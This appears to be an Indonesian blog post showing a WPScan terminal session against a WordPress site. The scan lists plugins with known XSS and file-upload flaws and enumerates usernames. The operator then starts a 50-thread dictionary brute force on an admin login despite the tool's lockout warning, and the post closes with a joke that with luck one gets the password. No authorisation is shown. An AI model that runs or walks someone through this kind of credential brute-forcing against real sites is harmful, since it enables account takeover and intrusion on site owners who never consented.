root@muring:/pentest/muring-tools/wpscan/wpscan# ruby wpscan.rb --url http://targetku.com --wordlist darkc0de.lst --threads 50
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version v2.1r6cedd67
Sponsored by the RandomStorm Open Source Initiative
@_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________
| URL: http://targetku.com/
| Started on Sun Aug 11 12:22:06 2013
[+] robots.txt available under 'http://targetku.com/robots.txt'
[+] Interesting header: SERVER: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_bwlimited/1.4 mod_qos/10.10
[+] Interesting header: X-POWERED-BY: PHP/5.3.22
[+] WordPress version 3.6 identified from advanced fingerprinting
[+] The WordPress theme in use is goblog/color/orange
| Name: goblog/color/orange
| Location: http://targetku.com/wp-content/themes/goblog/color/orange/
[+] Enumerating plugins from passive detection ...
4 plugins found :
| Name: contact-form-7 v3.4.2
| Location: http://targetku.com/wp-content/plugins/contact-form-7/
| Readme: http://targetku.com/wp-content/plugins/contact-form-7/readme.txt
| Name: easy-table v1.1.1
| Location: http://targetku.com/wp-content/plugins/easy-table/
| Readme: http://targetku.com/wp-content/plugins/easy-table/readme.txt
| Name: jj-nextgen-jquery-slider v1.3.9
| Location: http://targetku.com/wp-content/plugins/jj-nextgen-jquery-slider/
| Readme: http://targetku.com/wp-content/plugins/jj-nextgen-jquery-slider/readme.txt
| Name: nextgen-gallery
| Location: http://targetku.com/wp-content/plugins/nextgen-gallery/
| Readme: http://targetku.com/wp-content/plugins/nextgen-gallery/readme.txt
| Changelog: http://targetku.com/wp-content/plugins/nextgen-gallery/changelog.txt
|
| * Title: SWF Vulnerable to XSS Bundled in Many Wordpress Plugins
| * Reference: http://brindi.si/g/blog/vulnerable-swf-bundled-in-wordpress-plugins.html
| * Reference: http://secunia.com/advisories/51271/
|
| * Title: XSS in NextGEN Gallery <= 1.5.1
| * Reference: http://www.exploit-db.com/exploits/12098/
|
| * Title: swfupload.swf Multiple Cross Site Scripting Vulnerabilities
| * Reference: http://www.securityfocus.com/bid/60433
| * Reference: http://brindi.si/g/blog/vulnerable-swf-bundled-in-wordpress-plugins.html
| * Reference: http://secunia.com/advisories/51271/
|
| * Title: XSS in NextGEN Gallery <= 1.5.1
| * Reference: http://www.exploit-db.com/exploits/12098/
|
| * Title: swfupload.swf Multiple Cross Site Scripting Vulnerabilities
| * Reference: http://www.securityfocus.com/bid/60433
|
| * Title: NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)
| * Reference: http://wordpress.org/plugins/nextgen-gallery/changelog/
| * Reference: http://osvdb.org/94232
[+] Enumerating usernames ...
[+] We found the following 7 user/s :
+----+-----------------+----------------------+
| Id | Login | Name |
+----+-----------------+----------------------+
| 1 | bawa****** | ********* |
| 4 | rohy********* | ********* |
dst...
+----+-----------------+----------------------+
The plugin login-lockdown has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing !
[?] Do you want to start the brute force anyway ? [y/n]
y
[+] Starting the password brute forcer
Brute Forcing 'baw****' Time: 00:06:51 < > (1235 / 1707540) 0.07% ETA: ??:??:??
ERROR: No response from remote server. WAF/IPS?
Brute Forcing 'baw****' Time: 00:29:31 < > (5256 / 1707540) 0.30% ETA: ??:??:??
ERROR: No response from remote server. WAF/IPS?
Brute Forcing 'baw****' Time: 01:14:13 < > (12773 / 1707540) 0.74% ETA: ??:??:??
kalau beruntung... maka dapat passwordnya :D
kalau beruntung... maka dapat passwordnya :D
No comments:
Post a Comment
Silakan berikan komentar anda......